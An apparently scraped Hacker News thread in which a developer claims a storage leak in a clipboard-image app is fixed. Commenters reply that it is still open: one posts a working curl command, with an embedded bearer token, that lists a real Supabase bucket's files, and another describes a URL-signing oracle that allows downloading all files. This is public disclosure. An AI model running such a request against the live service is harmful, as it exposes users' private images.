top | item 46449134 (no title) imgopaal | 2 months ago Also Fixed. Images now use signed URLs with 1-year expiration. Public URLs are automatically converted to signed URLs. Storage bucket policies restrict access to user-specific folders. Appreciate you flagging this. discuss order hn newest foltik|1 month ago It appears to still be wide open: curl -X POST \ "https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/list/clipboard-images" \ -H "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqeW5tamx1YWJxd3FodGR4YnRsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDIzODU1MDQsImV4cCI6MjA1Nzk2MTUwNH0.R6pSgPFgHe3ZU9DfKykE98MC1ObYihWdZuhy9v9Y_p0" \ -H "content-type: application/json" \ -d '{"prefix": "7b407af2-f30c-4e37-adc7-b7bf48f2661b"}' \ | jq Retr0id|1 month ago There is also an URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files.Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...
foltik|1 month ago It appears to still be wide open: curl -X POST \ "https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/list/clipboard-images" \ -H "authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndqeW5tamx1YWJxd3FodGR4YnRsIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NDIzODU1MDQsImV4cCI6MjA1Nzk2MTUwNH0.R6pSgPFgHe3ZU9DfKykE98MC1ObYihWdZuhy9v9Y_p0" \ -H "content-type: application/json" \ -d '{"prefix": "7b407af2-f30c-4e37-adc7-b7bf48f2661b"}' \ | jq Retr0id|1 month ago There is also an URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files.Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...
Retr0id|1 month ago There is also an URL-signing oracle that allows any URL to be signed, so it's still possible to enumerate + download all files.Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...
foltik|1 month ago
Retr0id|1 month ago
Example: https://wjynmjluabqwqhtdxbtl.supabase.co/storage/v1/object/s...